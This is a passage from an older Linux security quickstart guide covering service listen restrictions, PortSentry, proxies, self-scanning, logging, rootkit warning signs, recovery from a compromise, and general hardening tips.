+---------------------------------------------------------------------------+
| service tftp                                                              |
| {                                                                         |
|        socket_type     = dgram                                            |
|        bind            = 192.168.1.1                                      |
|        instances       = 2                                                |
|        protocol        = udp                                              |
|        wait            = yes                                              |
|        user            = nobody                                           |
|        only_from       = 192.168.1.0                                      |
|        server          = /usr/sbin/in.tftpd                               |
|        server_args     = /tftpboot                                        |
|        disable         = no                                               |
| }                                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Notice the bind statement. We are only listening on, or "binding" to, the
private, LAN interface here. No outside connections can be made since the
outside port is not even opened. We are also only accepting connections from
192.168.1.0, our LAN. For xinetd's purposes, this denotes any IP address
beginning with "192.168.1". Note that the syntax is different from inetd. The
server statement in this case is the tftp daemon, in.tftpd. Again, this
assumes that libwrap/tcpwrappers support is compiled into xinetd. The user
running the daemon will be "nobody". Yes, there is a user account called
"nobody", and it is wise to run such daemons as non-root users whenever
possible. Lastly, the disable statement is xinetd's way of turning services
on or off. In this case, it is "on". This is on here only as an example. Do
NOT run tftp as a public service as it is unsafe.
-----------------------------------------------------------------------------

5.4. PortSentry

[http://www.psionic.org/products/portsentry.html] Portsentry works quite
differently than the other tools discussed so far. Portsentry does what its
name implies -- it guards ports. Portsentry is configured with the /etc/
portsentry/portsentry.conf file.

Unlike the other applications discussed above, it does this by actually
becoming the listening server on those ports. Kind of like baiting a trap.
Running netstat -taup as root while portsentry is running, will show
portsentry as the LISTENER on whatever ports portsentry is configured for. If
portsentry senses a connection attempt, it blocks it completely. And then
goes a step further and blocks the route to that host to stop all further
traffic. Alternately, ipchains or iptables can be used to block the host
completely. So it makes an excellent tool to stop port scanning of a range of
ports.

But portsentry has limited flexibility as to whether it allows a given
connection. It is pretty much all or nothing. You can define specific IP
addresses that it will ignore in /etc/portsentry/portsentry.ignore. But you
cannot allow selective access to individual ports. This is because only one
server can bind to a particular port at the same time, and in this case that
is portsentry itself. So it has limited usefulness as a stand-alone firewall.
As part of an overall firewall strategy, yes, it can be quite useful. For
most of us, it should not be our first line of defense, and we should only
use it in conjunction with other tools.

Suggestion on when portsentry might be useful:

<A0><A0>*<2A>As a second layer of defense, behind either ipchains or iptables. Packet
    filtering will catch the packets first, so that anything that gets to
    portsentry would indicate a misconfiguration. Do not use in conjunction
    with inetd services -- it won't work. They will butt heads.

<A0><A0>*<2A>As a way to catch full range ports scans. Open a pinhole or two in the
    packet filter, and let portsentry catch these and re-act accordingly.

<A0><A0>*<2A>If you are very sure you have no exposed public servers at all, and you
    just want to know who is up to what. But do not assume anything about
    what portsentry is protecting. By default it does not watch all ports,
    and may even leave some very commonly probed ports open. So make sure you
    configure it accordingly. And make sure you have tested and verified your
    set up first, and that nothing is exposed.


All in all, the packet filters make for a better firewall.
-----------------------------------------------------------------------------

5.5. Proxies

The dictionary defines "proxy" as "the authority or power to act on behalf of
another". This pretty well describes software proxies as well. It is an
intermediary in the connection path. As an example, if we were using a web
proxy like "squid" ([http://www.squid-cache.org/] http://www.squid-cache.org
/), every time we browse to a web site, we would actually be connecting to
our locally running squid server. Squid in turn, would relay our request to
the ultimate, real destination. And then squid would relay the web pages back
to us. It is a go-between. Like "firewalls", a "proxy" can refer to either a
specific application, or a dedicated server which runs a proxy application.

Proxies can perform various duties, not all of which have much to do with
security. But the fact that they are an intermediary, makes them a good place
to enforce access control policies, limit direct connections through a
firewall, and control how the network behind the proxy looks to the Internet.
So this makes them strong candidates to be part of an overall firewall
strategy. And, in fact, are sometimes used instead of packet filtering
firewalls. Proxy based firewalls probably make more sense where many users
are behind the same firewall. And it probably is not high on the list of
components necessary for home based systems.

Configuring and administering proxies can be complex, and is beyond the scope
of this document. The Firewall and Proxy Server HOWTO, [http://tldp.org/HOWTO
/Firewall-HOWTO.html ] http://tldp.org/HOWTO/Firewall-HOWTO.html, has
examples of setting up proxy firewalls. Squid usage is discussed at [http://
squid-docs.sourceforge.net/latest/html/book1.htm] http://
squid-docs.sourceforge.net/latest/html/book1.htm
-----------------------------------------------------------------------------

5.6. Individual Applications

Some servers may have their own access control features. You should check
this for each server application you run. We'll only look at a few of the
common ones in this section. Man pages, and other application specific
documentation, is your friend here. This should be done whether you have
confidence in your firewall or not. Again, layers of protection is always
best.

<A0><A0>*<2A>BIND - a very common package that provides name server functionality. The
    daemon itself is "named". This only requires full exposure to the
    Internet if you are providing DNS look ups for one or more domains to the
    rest of the world. If you are not sure what this means, you do not need,
    or want, it exposed. For the overwhelming majority of us this is the
    case. It is a very common crack target.

    But it may be installed, and can be useful in a caching only mode. This
    does not require full exposure to the Internet. Limit the interfaces on
    which it "listens" by editing /etc/named.conf (random example shown):

    +---------------------------------------------------------------+
    |                                                               |
    | options {                                                     |
    |   directory "/var/named";                                     |
    |   listen-on { 127.0.0.1; 192.168.1.1; };                      |
    |   version "N/A";                                              |
    | };                                                            |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    The "listen-on" statement is what limits where named listens for DNS
    queries. In this example, only on localhost and bigcat's LAN interface.
    There is no port open for the rest of the world. It just is not there.
    Restart named after making changes.

<A0><A0>*<2A>X11 can be told not to allow TCP connections by using the -nolisten tcp
    command line option. If using startx, you can make this automatic by
    placing alias startx="startx -- -nolisten tcp" in your ~/.bashrc, or the
    system-wide file, /etc/bashrc, with your text editor. If using xdm (or
    variants such as gdm, kdm, etc), this option would be specified in /etc/
    X11/xdm/Xservers (or comparable) as :0 local /usr/bin/X11/X -nolisten
    tcp. gdm actually uses /etc/X11/gdm/gdm.conf.

    If using xdm (or comparable) to start X automatically at boot, /etc/
    inittab can be modified as: xdm -udpPort 0, to further restrict
    connections. This is typically near the bottom of /etc/inittab.

<A0><A0>*<2A>Recent versions of sendmail can be told to listen only on specified
    addresses:

    +---------------------------------------------------------------+
    | # SMTP daemon options                                         |
    | O DaemonPortOptions=Port=smtp,Addr=127.0.0.1, Name=MTA        |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    The above excerpt is from /etc/sendmail.cf which can be carefully added
    with your text editor. The sendmail.mc directive is:

    +---------------------------------------------------------------------------+
    |                                                                           |
    | dnl This changes sendmail to only listen on the loopback device 127.0.0.1 |
    | dnl and not on any other network devices.                                 |
    | DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')                      |
    |                                                                           |
    |                                                                           |
    +---------------------------------------------------------------------------+

    In case you would prefer to build a new sendmail.cf, rather than edit the
    existing one. Other mail server daemons likely have similar configuration
    options. Check your local documentation.

<A0><A0>*<2A>SAMBA connections can be restricted in smb.conf:

    +---------------------------------------------------------------+
    | bind interfaces = true                                        |
    | interfaces = 192.168.1. 127.                                  |
    | hosts allow = 192.168.1. 127.                                 |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    This will only open, and allow, connections from localhost (127.0.0.1),
    and the local LAN address range. Adjust the LAN address as needed.

<A0><A0>*<2A>The CUPS print daemon can be told where to listen for connections. Add to
    /etc/cups/cupsd.conf:

    +---------------------------------------------------------------+
    | Listen 192.168.1.1:631                                        |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    This will only open a port at the specified address and port number.

<A0><A0>*<2A>xinetd can force daemons to listen only on a specified address with its
    "bind" configuration directive. For instance, an internal LAN interface
    address. See man xinetd.conf for this and other syntax. There are various
    other control mechanisms as well.


As always, anytime you make system changes, backup the configuration file
first, restart the appropriate daemon afterward, and then check the
appropriate logs for error messages.
-----------------------------------------------------------------------------

5.7. Verifying

The final step after getting your firewall in place, is to verify that it is
doing what you intended. You would be wise to do this anytime you make even
minor changes to your system configuration.

So how to do this? There are several things you can do.

For our packet filters like ipchains and iptables, we can list all our rules,
chains, and associated activity with iptables -nvL | less (substitute
ipchains if appropriate). Open your xterm as wide as possible to avoid
wrapping long lines.

This should give you an idea if your chains are doing what you think they
should. You may want to perform some of the on-line tasks you normally do
first: open a few web pages, send and retrieve mail, etc. This will, of
course, not give you any information on tcpwrappers or portsentry. tcpdchk
can be used to verify tcpwrappers configuration (except with xinetd).

And then, scan yourself. nmap is the scanning tool of choice and may be
available via your distribution , or from [http://www.insecure.org/nmap/
nmap_download.html] http://www.insecure.org/nmap/nmap_download.html. nmap is
very flexible, and essentially is a "port prober". In other words, it looks
for open ports, among other things. See the nmap man page for details.

If you do run nmap against yourself (e.g. nmap localhost), this should tell
you what ports are open -- and visible locally only! Which hopefully by now,
is quite different from what can be seen from the outside. So, scan yourself,
and then find a trusted friend, or site (see the Links section), to scan you
from the outside. Make sure you are not violating your ISPs Terms of Service
by port scanning. It may not be allowed, even if the intentions are
honorable. Scanning from outside is the best way to know how the rest of the
world sees you. This should tell you how well that firewall is working. See
the nmap section in the Appendix for some examples on nmap usage.

One caveat on this: some ISPs may filter some ports, and you will not know
for sure how well your firewall is working. Conversely, they make it look
like certain ports are open by using web, or other, proxies. The scanner may
see the web proxy at port 80 and mis-report it as an open port on your
system.

Another option is to find a website that offers full range testing. [http://
www.hackerwhacker.com] http://www.hackerwhacker.com is one such site. Make
sure that any such site is not just scanning a relatively few well known
ports.

Repeat this procedure with every firewall change, every system upgrade or new
install, and when any key components of your system changes.

You may also want to enable logging all the denied traffic. At least
temporarily. Once the firewall is verified to be doing what you think it
should, and if the logs are hopelessly overwhelming, you may want to disable
logging.

If relying on portsentry at all, please read the documentation. Depending on
your configuration it will either drop the route to the scanner, or implement
a ipchains/iptables rule doing the same thing. Also, since it "listens" on
the specified ports, all those ports will show as "open". A false alarm in
this case.
-----------------------------------------------------------------------------

5.8. Logging

Linux does a lot of logging. Usually to more than one file. It is not always
obvious what to make of all these entries -- good, bad or indifferent?
Firewall logs tend to generate a fair amount of each. Of course, you are
wanting to stop only the "bad", but you will undoubtedly catch some harmless
traffic as well. The 'net has a lot of background noise.

In many cases, knowing the intentions of an incoming packet are almost
impossible. Attempted intrusion? Misbehaved protocol? Mis-typed IP address?
Conclusions can be drawn based on factors such as destination port, source
port, protocol, and many other variables. But there is no substitute for
experience in interpreting firewall logs. It is a black art in many cases.

So do we really need to log? And how much should we be trying to log? Logging
is good in that it tells us that the firewall is functional. Even if we don't
understand much of it, we know it is doing "something". And if we have to, we
can dig into those logs and find whatever data might be called for.

On the other hand, logging can be bad if it is so excessive, it is difficult
to find pertinent data, or worse, fills up a partition. Or if we over re-act
and take every last entry as an all out assault. Some perspective is a great
benefit, but something that new users lack almost by definition. Again, once
your firewall is verified, and you are perplexed or overwhelmed, home desktop
users may want to disable as much logging as possible. Anyone with greater
responsibilities should log, and then find ways to extract the pertinent data
from the logs by filtering out extraneous information.

Not sure where to look for log data? This could conceivably be many places
depending on how your distribution configured the various daemons and syslogd
. Most logging is done in /var/log/*. Check that directory with ls -l /var/
log/ and see if you can tell the most active logs by size and timestamp.
Also, look at /etc/syslog.conf to see where the default logs are. /var/log/
messages is a good place to look for starters.

Portsentry and tcpwrappers do a certain amount of logging that is not
adjustable. xinetd has logging enhancements that can be turned on. Both
ipchains and iptables, on the other hand, are very flexible as to what is
logged.

For ipchains the -l option can be added to any rule. iptables uses the -j LOG
target, and requires its own, separate rule instead. iptables goes a few
steps further and allows customized log entries, and rate limiting. See the
man page. Presumably, we are more interested in logging blocked traffic, so
we'd confine logging to only our DENY and REJECT rules.

So whether you log, and how much you log, and what you do with the logs, is
an individual decision, and probably will require some trial and error so
that it is manageable. A few auditing and analytical tools can be quite
helpful:

Some tools that will monitor your logs for you and notify you when necessary.
These likely will require some configuration, and trial and error, to make
the most out of them:

<A0><A0>*<2A>A nice log entry analyzer for ipchains and iptables from Manfred Bartz:
    [http://www.logi.cc/linux/NetfilterLogAnalyzer.php3] http://www.logi.cc/
    linux/NetfilterLogAnalyzer.php3. What does all that stuff mean anyway?

<A0><A0>*<2A>LogSentry (formerly logcheck) is available from [http://www.psionic.org/
    products/logsentry.html] http://www.psionic.org/products/logsentry.html,
    the same group that is responsible for portsentry. LogSentry is an all
    purpose log monitoring tool with a flexible configuration, that handles
    multiple logs.

<A0><A0>*<2A>[http://freshmeat.net/projects/firelogd/] http://freshmeat.net/projects/
    firelogd/, the Firewall Log Daemon from Ian Jones, is designed to watch,
    and send alerts on iptables or ipchains logs data.

<A0><A0>*<2A>[http://freshmeat.net/projects/fwlogwatch/] http://freshmeat.net/projects
    /fwlogwatch/ by Boris Wesslowski, is a similar idea, but supports more
    log formats.


-----------------------------------------------------------------------------
5.9. Where to Start

Let's take a quick look at where to run our firewall scripts from.

Portsentry can be run as an init process, like other system services. It is
not so important when this is done. Tcpwrappers will be automatically be
invoked by inetd or xinetd, so not to worry there either.

But the packet filtering scripts will have to be started somewhere. And many
scripts will have logic that uses the local IP address. This will mean that
the script must be started after the interface has come up and been assigned
an IP address. Ideally, this should be immediately after the interface is up.
So this depends on how you connect to the Internet. Also, for protocols like
PPP or DHCP that may be dynamic, and get different IP's on each re-connect,
it is best to have the scripts run by the appropriate daemon.

For PPP, you probably have an /etc/ppp/ip-up file. This will be executed
every time there is a connect or re-connect. You should put the full path to
your firewall script here. Check the local documentation for the correct
location. Debian use files in /etc/ppp/ip-up.d/, so either put the script
itself there, or a symlink to it. Red Hat uses /etc/ppp/ip-up.local for any
user defined, local PPP configuration.

For DHCP, it depends on which client. dhcpcd will execute /etc/dhcpcd/dhcpcd-
<interface>.exe (e.g. dhcpcd-eth0.exe) whenever a lease is obtained or
renewed. So this is where to put a reference to your firewall script. For
pump, the main configuration file is /etc/pump.conf. Pump will run whatever
script is defined by the "script" statement any time there is a new or
renewed lease:

 script /usr/local/bin/ipchains.sh


If you have a static IP address (i.e. it never changes), the placement is not
so important and should be before the interface comes up!
-----------------------------------------------------------------------------

5.10. Summary and Conclusions for Step 3

In this section we looked at various components that might be used to
construct a "firewall". And learned that a firewall is as much a strategy and
combination of components, as it is any one particular application or
component. We looked at a few of the most commonly available applications
that can be found on most, if not all, Linux systems. This is not a
definitive list.

This is a lot of information to digest at all at one time and expect anyone
to understand it all. Hopefully this can used as a starting point, and used
for future reference as well. The packet filter firewall examples can be used
as starting points as well. Just use your text editor, cut and paste into a
file with an appropriate name, and then run chmod +x against it to make it
executable. Some minor editing of the variables may be necessary. Also look
at the Links section for sites and utilities that can be used to generate a
custom script. This may be a little less daunting.

Now we are done with Steps 1, 2 and 3. Hopefully by now you have already
instituted some basic measures to protect your system(s) from the various and
sundry threats that lurk on networks. If you haven't implemented any of the
above steps yet, now is a good time to take a break, go back to the top, and
have at it. The most important steps are the ones above.

A few quick conclusions...

"What is best iptables, ipchains, tcpwrappers, or portsentry?" The quick
answer is that iptables can do more than any of the others. So if you are
using a 2.4 kernel, use iptables. Then, ipchains if using a 2.2 kernel. The
long answer is "it just depends on what you are doing and what the objective
is". Sorry. The other tools all have some merit in any given situation, and
all can be effective in the right situation.

"Do I really need all these packages?" No, but please combine more than one
approach, and please follow all the above recommendations. iptables by itself
is good, but in conjunction with some of the other approaches, we are even
stronger. Do not rely on any single mechanism to provide a security blanket.
"Layers" of protection is always best. As is sound administrative practices.
The best iptables script in the world is but one piece of the puzzle, and
should not be used to hide other system weaknesses.

"If I have a small home LAN, do I need to have a firewall on each computer?"
No, not necessary as long as the LAN gateway has a properly configured
firewall. Unwanted traffic should be stopped at that point. And as long as
this is working as intended, there should be no unwanted traffic on the LAN.
But, by the same token, doing this certainly does no harm. And on larger LANs
that might be mixed platform, or with untrusted users, it would be advisable.
-----------------------------------------------------------------------------

6. Intrusion Detection

This section will deal with how to get early warning, how to be alerted after
the fact, and how to clean up from intrusion attempts.
-----------------------------------------------------------------------------

6.1. Intrusion Detection Systems (IDS)

Intrusion Detection Systems (IDS for short) are designed to catch what might
have gotten past the firewall. They can either be designed to catch an active
break-in attempt in progress, or to detect a successful break-in after the
fact. In the latter case, it is too late to prevent any damage, but at least
we have early awareness of a problem. There are two basic types of IDS: those
protecting networks, and those protecting individual hosts.

For host based IDS, this is done with utilities that monitor the filesystem
for changes. System files that have changed in some way, but should not
change -- unless we did it -- are a dead give away that something is amiss.
Anyone who gets in, and gets root, will presumably make changes to the system
somewhere. This is usually the very first thing done. Either so he can get
back in through a backdoor, or to launch an attack against someone else. In
which case, he has to change or add files to the system.

This is where tools like tripwire ([http://www.tripwire.org] http://
www.tripwire.org) play a role. Such tools monitor various aspects of the
filesystem, and compare them against a stored database. And can be configured
to send an alert if any changes are detected. Such tools should only be
installed on a known "clean" system.

For home desktops and home LANs, this is probably not an absolutely necessary
component of an overall security strategy. But it does give peace of mind,
and certainly does have its place. So as to priorities, make sure the Steps
1, 2 and 3 above are implemented and verified to be sound, before delving
into this.

RPM users can get somewhat the same results with rpm -Va, which will verify
all packages, but without all the same functionality. For instance, it will
not notice new files added to most directories. Nor will it detect files that
have had the extended attributes changed (e.g. chattr +i, man chattr and man
lsattr). For this to be helpful, it needs to be done after a clean install,
and then each time any packages are upgraded or added. Example:

+---------------------------------------------------------------------------+
|                                                                           |
| # rpm -Va > /root/system.checked                                          |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Then we have a stored system snapshot that we can refer back to.

Debian users have a similar tool with debsums.

+---------------------------------------------------------------------------+
|                                                                           |
| # debsums -s > /root/system.checked                                       |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Another idea is to run chkrootkit ([http://www.chkrootkit.org/] http://
www.chkrootkit.org/) as a weekly cron job. This will detect common "rootkits"
.
-----------------------------------------------------------------------------

6.2. Have I Been Hacked?

Maybe you are reading this because you've noticed something "odd" about your
system, and are suspicious that someone was gotten in? This can be a clue.

The first thing an intruder typically does is install a "rootkit". There are
many prepackaged rootkits available on the Internet. The rootkit is
essentially a script, or set of scripts, that makes quick work of modifying
the system so the intruder is in control, and he is well hidden. He does this
by installing modified binaries of common system utilities and tampering with
log files. Or by using special kernel modules that achieve similar results.
So common commands like ls may be modified so as to not show where he has his
files stored. Clever!

A well designed rootkit can be quite effective. Nothing on the system can
really be trusted to provide accurate feedback. Nothing! But sometimes the
modifications are not as smooth as intended and give hints that something is
not right. Some things that might be warning signs:

<A0><A0>*<2A>Login acts weird. Maybe no one can login. Or only root can login. Any
    login weirdness at all should be suspicious. Similarly, any weirdness
    with adding or changing passwords.

    Wierdness with other system commands (e.g. top or ps) should be cause for
    concern as well.

<A0><A0>*<2A>System utilities are slower, or awkward, or show strange and unexpected
    results. Common utilities that might be modified are: ls, find, who, w,
    last, netstat, login, ps, top. This is not a definitive list!

<A0><A0>*<2A>Files or directories named "..." or ".. " (dot dot space). A sure bet in
    this case. Files with haxor looking names like "r00t-something".

<A0><A0>*<2A>Unexplained bandwidth usage, or connections. Script kiddies have a
    fondness for IRC, so such connections should raise a red flag.

<A0><A0>*<2A>Logs that are missing completely, or missing large sections. Or a sudden
    change in syslog behavior.

<A0><A0>*<2A>Mysterious open ports, or processes.

<A0><A0>*<2A>Files that cannot be deleted or moved. Some rootkits use chattr to make
    files "immutable", or not changable. This kind of change will not show up
    with ls, or rpm -V, so the files look normal at first glance. See the man
    pages for chattr and lsattr on how to reverse this. Then see the next
    section below on restoring your system as the jig is up at this point.

    This is becoming a more and more common script kiddie trick. In fact, one
    quick test to run on a suspected system (as root):
    +---------------------------------------------------------------+
    |  /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep i--         |
    |                                                               |
    +---------------------------------------------------------------+

    This will look for any "immutable" files in root's PATH, which is almost
    surely a sign of trouble since no standard distributions ship files in
    this state. If the above command turns up anything at all, then plan on
    completely restoring the system (see below). A quick sanity check:
    +---------------------------------------------------------------+
    |  # chattr +i /bin/ps                                          |
    |  # /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep "i--"     |
    |    ---i---------- /bin/ps                                     |
    |  # chattr -i /bin/ps                                          |
    |                                                               |
    +---------------------------------------------------------------+

    This is just to verify the system is not tampered with to the point that
    lsattr is completely unreliable. The third line is exactly what you
    should see.

<A0><A0>*<2A>Indications of a "sniffer", such as log messages of an interface entering
    "promiscuous" mode.

<A0><A0>*<2A>Modifications to /etc/inetd.conf, rc.local, rc.sysint or /etc/passwd.
    Especially, any additions. Try using cat or tail to view these files.
    Additions will most likely be appended to the end. Remember though such
    changes may not be "visible" to any system tools.


Sometimes the intruder is not so smart and forgets about root's
.bash_history, or cleaning up log entries, or even leaves strange, leftover
files in /tmp. So these should always be checked too. Just don't necessarily
expect them to be accurate. Often such left behind files, or log entries,
will have obvious script kiddie sounding names, e.g. "r00t.sh".

Packet sniffers, like tcpdump ([http://www.tcpdump.org] http://
www.tcpdump.org), might be useful in finding any uninvited traffic.
Interpreting sniffer output is probably beyond the grasp of the average new
user. snort ([http://www.snort.org] http://www.snort.org), and ethereal
([http://www.ethereal.com] http://www.ethereal.com), are also good. Ethereal
has a GUI.

As mentioned, a compromised system will undoubtedly have altered system
binaries, and the output of system utilities is not to be trusted. Nothing on
the system can be relied upon to be telling you the whole truth.
Re-installing individual packages may or may not help since it could be
system libraries or kernel modules that are doing the dirty work. The point
here is that there is no way to know with absolute certainty exactly what
components have been altered.

RPM users can use rpm -Va |less to attempt to verify the integrity all
packages. But again there is no assurance that rpm itself has not been
tampered with, or the system components that RPM relies on.

If you have pstree on your system, try this instead of the standard ps.
Sometimes the script kiddies forget about this one. No guarantees though that
this is accurate either.

You can also try querying the /proc filesystem, which contains everything the
kernel knows about processes that are running:

+---------------------------------------------------------------------------+
|                                                                           |
| # cat /proc/*/stat | awk '{print $1,$2}'                                  |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

This will provide a list of all processes and PID numbers (assuming a
malicious kernel module is not hiding this).

Another approach is to visit [http://www.chkrootkit.org] http://
www.chkrootkit.org, download their rootkit checker, and see what it says.

Some interesting discussions on issues surrounding forensics can be found at
[http://www.fish.com/security/] http://www.fish.com/security/. There is also
a collection of tools available, aptly called "The Coroner's Toolkit" (TCT).

Read below for steps on recovering from an intrusion.
-----------------------------------------------------------------------------

6.3. Reclaiming a Compromised System

So now you've confirmed a break-in, and know that someone else has root
access, and quite likely one or more hidden backdoors to your system. You've
lost control. How to clean up and regain control?

There is no sure fire way of doing this short of a complete re-install. There
is no way to find with assurance all the modified files and backdoors that
may have been left. Trying to patch up a compromised system risks a false
sense of security and may actually aggravate an already bad situation.

The steps to take, in this order:

<A0><A0>*<2A>Pull the plug and disconnect the machine. You may be unwittingly
    participating in criminal activity, and doing to others what has been
    done to you.

<A0><A0>*<2A>Depending on the needs of the situation and time available to restore the
    system, it is advantageous to learn as much as you can about how the
    attacker got in, and what was done in order to plug the hole and avoid a
    recurrence. This could conceivably be time consuming, and is not always
    feasible. And it may require more expertise than the typical user
    possesses.

<A0><A0>*<2A>Backup important data. Do not include any system files in the backup, and
    system configuration files like inetd.conf. Limit the backup to personal
    data files only! You don't want to backup, then restore something that
    might open a backdoor or other hole.

<A0><A0>*<2A>Re-install from scratch, and reformat the drive during the installation (
    mke2fs) to make sure no remnants are hiding. Actually, replacing the
    drive is not a bad idea. Especially, if you want to keep the compromised
    data available for further analysis.

<A0><A0>*<2A>Restore from backups. After a clean install is the best time to install
    an IDS (Intrusion Detection System) such as tripwire ([http://
    www.tripwire.org] http://www.tripewire.org).

<A0><A0>*<2A>Apply all updates or patches for your distribution. Check your vendor's
    web site for security related notices.

<A0><A0>*<2A>Re-examine your system for unnecessary services. Re-examine your firewall
    and access policies, and tighten all holes. Use new passwords, as these
    were stolen in all likelihood.

<A0><A0>*<2A>Re-connect system ;-)


At this time, any rootkit cleanup tools that may be available on-line are not
recommended. They probably do work just fine most of the time. But again, how
to be absolutely sure that all is well and all vestiges of the intrusion are
gone?
-----------------------------------------------------------------------------

7. General Tips

This section will quickly address some general concepts for maintaining a
more secure and reliable system or network. Let's emphasize "maintaining"
here since computer systems change daily, as does the environment around
them. As mentioned before, there isn't any one thing that makes a system
secure. There are too many variables. Security is an approach and an attitude
more than it is a reliance on any particular product, application or specific
policy.

<A0><A0>*<2A>Do not allow remote root logins. This may be controlled by a
    configuration file such as /etc/securetty. Remove any lines that begin
    "pts". This is one big security hole.

<A0><A0>*<2A>In fact, don't log in as root at all. Period. Log in on your user account
    and su to root when needed. Whether the login is remote or local. Or use
    sudo, which can run individual commands with root privileges. (There
    should be a sudo package available from your vendor.) This takes some
    getting used to, but it is the "right" way to do things. And the safest.
    And will become more a more natural way of doing this as time goes on.

    I know someone is saying right now "but that is so much trouble, I am
    root, and it is my system". True, but root is a specialized account that
    was not ever meant to be used as a regular user account. Root has access
    to everything, even hardware devices. The system "trusts" root. It
    believes that you know what you are doing. If you make a mistook, it
    assumes that you meant that, and will do it's best to do what you told it
    to do...even if that destroys the system!

    As an example, let's say you start X as root, open Netscape, and visit a
    web site. The web page has badly behaved java script. And conceivably now
    that badly written java script might have access to much more of your
    system than if you had done it the "right" way.

<A0><A0>*<2A>Take passwords seriously. Don't give them out to anyone. Don't use the
    same one for everything. Don't use root's password for anything else --
    except root's password! Never sign up or register on line, using any of
    your system passwords. Passwords should be a combination of mixed case
    letters, numbers and/or punctuation and a reasonable length (eight
    characters or longer). Don't use so-called "dictionary" words that are
    easy to guess like "cat" or "dog". Don't incorporate personal information
    like names or dates or hostnames. Don't write down system passwords --
    memorize them.

    Use the more secure "shadow" passwords. This should be the default for
    any recent Linux distribution now. If the file /etc/shadow exists, then
    it is enabled already. The commands pwconv and grpconv, can be used to
    convert password and group files to shadow format if available.

<A0><A0>*<2A>Avoid using programs that require clear text logins over untrusted
    networks like the Internet. Telnet is a prime example. ssh is much
    better. If there is any support for SSL (Secure Socket Layers), use it.
    For instance, does your ISP offer POP or IMAP mail via SSL? Recent
    distributions should include [http://www.openssl.org/] openssl, and many
    Linux applications can use SSL where support is available.

<A0><A0>*<2A>Set resource limits. There are various ways to do this. The need for this
    probably increases with the number of users accessing a given system. Not
    only does setting limits on such things as disk space prevent intentional
    mischief, it can also help with unintentionally misbehaved applications
    or processes. quota (man quota) can be used to set disk space limits.
    Bash includes the ulimit command (man ulimit or man bash), that can limit
    various functions on a per user basis.

    Also, not discussed here at any length, but PAM (Pluggable Authentication
    Modules) has a very sophisticated approach to controlling various system
    functions and resources. See man pam to get started. PAM is configured
    via either /etc/pam.conf or /etc/pam.d/*. Also files in /etc/security/*,
    including /etc/security/limits.conf, where again various sane limits can
    be imposed. An in depth look at PAM is beyond the scope of this document.
    The User-Authentication HOWTO ([http://tldp.org/HOWTO/
    User-Authentication-HOWTO/index.html] http://tldp.org/HOWTO/
    User-Authentication-HOWTO/index.html) has more on this.

<A0><A0>*<2A>Make sure someone with a clue is getting root's mail. This can be done
    with an "alias". Typically, the mail server will have a file such as /etc
    /aliases where this can defined. This can conceivably be an account on
    another machine if need be:

    +---------------------------------------------------------------+
    |                                                               |
    | # Person who should get root's mail.  This alias              |
    | # must exist.                                                 |
    | # CHANGE THIS LINE to an account of a HUMAN                   |
    | root:           hal@bigcat                                    |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    Remember to run newaliases (or equivalent) afterward.

<A0><A0>*<2A>Be careful where you get software. Use trusted sources. How well do you
    trust complete strangers? Check your vendor first if looking for a
    specific package. It will probably be best suited for your system any
    way. Or, the original package's project site is good as well. Installing
    from raw source (either tarball or src.rpm) at least gives you the
    ability to examine the code. Even if you don't understand it ;-) While
    this does not seem to be a wide spread problem with Linux software sites,
    it is very trivial for someone to add a very few lines of code, turning
    that harmless looking binary into a "Trojan horse" that opens a backdoor
    to your system. Then the jig is up.

<A0><A0>*<2A>So someone has scanned you, probed you, or otherwise seems to want into
    your system? Don't retaliate. There is a good chance that the source IP
    address is a compromised system, and the owner is a victim already. Also,
    you may be violating someone's Terms of Service, and have trouble with
    your own ISP. The best you can do is to send your logs to the abuse
    department of the source IP's ISP, or owner. This is often something like
    "abuse@someisp.com". Just don't expect to hear much back. Generally
    speaking, such activity is not legally criminal, unless an actual
    break-in has taken place. Furthermore, even if criminal, it will never be
    prosecuted unless significant damage (read: big dollars) can be shown.

<A0><A0>*<2A>Red Hat,Mandrake and Debian users can install the "Bastille Hardening
    System", [http://www.bastille-linux.org/] http://www.bastille-linux.org/.
    This is a multi-purpose system for "hardening" Red Hat and Mandrake
    system security. It has a GUI interface which can be used to construct
    firewall scripts from scratch and configure PAM among many other things.
    Debian support is new.

<A0><A0>*<2A>So you have a full-time Internet connection via cable-modem or DSL. But
    do you always use it, or always need it? There's an old saying that "the
    only truly secure system, is a disconnected system". Well, that's
    certainly one option. So take that interface down, or stop the
    controlling daemon (dhcpcd, pppoed, etc). Or possibly even set up cron
    jobs to bring your connection up and down according to your normal
    schedule and usage.

<A0><A0>*<2A>What about cable and DSL routers that are often promoted as "firewalls"?
    The lower priced units are mostly equating NAT (Network Address
    Translation), together with the ability to open holes for ports through
    it, as a firewall. While NAT itself does provide a fair degree of
    security for the systems behind the NAT gateway, this does not constitute
    anything but a very rudimentary firewall. And if holes are opened, there
    is still exposure. Also, you are relying on the router's firmware and
    implementation not to be flawed. It is wise to have some kind of
    additional protection behind such routers.

<A0><A0>*<2A>What about wireless network cards and hubs? Insecure, despite what the
    manufacturers may claim. Treat these connections just as you would an
    Internet connection. Use secure protocols like ssh only! Even if it is
    just one LAN box to another.

<A0><A0>*<2A>If you find you need to run a particular service, and it is for just you,
    or maybe a relatively small number of people, use a non-standard port.
    Most server daemons support this. For instance, sshd runs on port 22 by
    default. All worms and script kiddies will expect it there, and look for
    it there. So, run it on another port! See the sshd man page.

<A0><A0>*<2A>What about firewalls that block Internet connections according to the
    application (like ZoneAlarm from Windowsdom)? These were designed with
    this feature primarily because of the plethora of virii and trojans that
    are so common with MS operating systems. This is really not a problem on
    Linux. So, really no such application exists on Linux at this time. And
    there does not seem to be enough demand for it that someone has taken the
    time to implement it. A better firewall can be had on Linux, by following
    the other suggestions in this document.

<A0><A0>*<2A>Lastly, know your system! Let's face it, if you are new to Linux, you
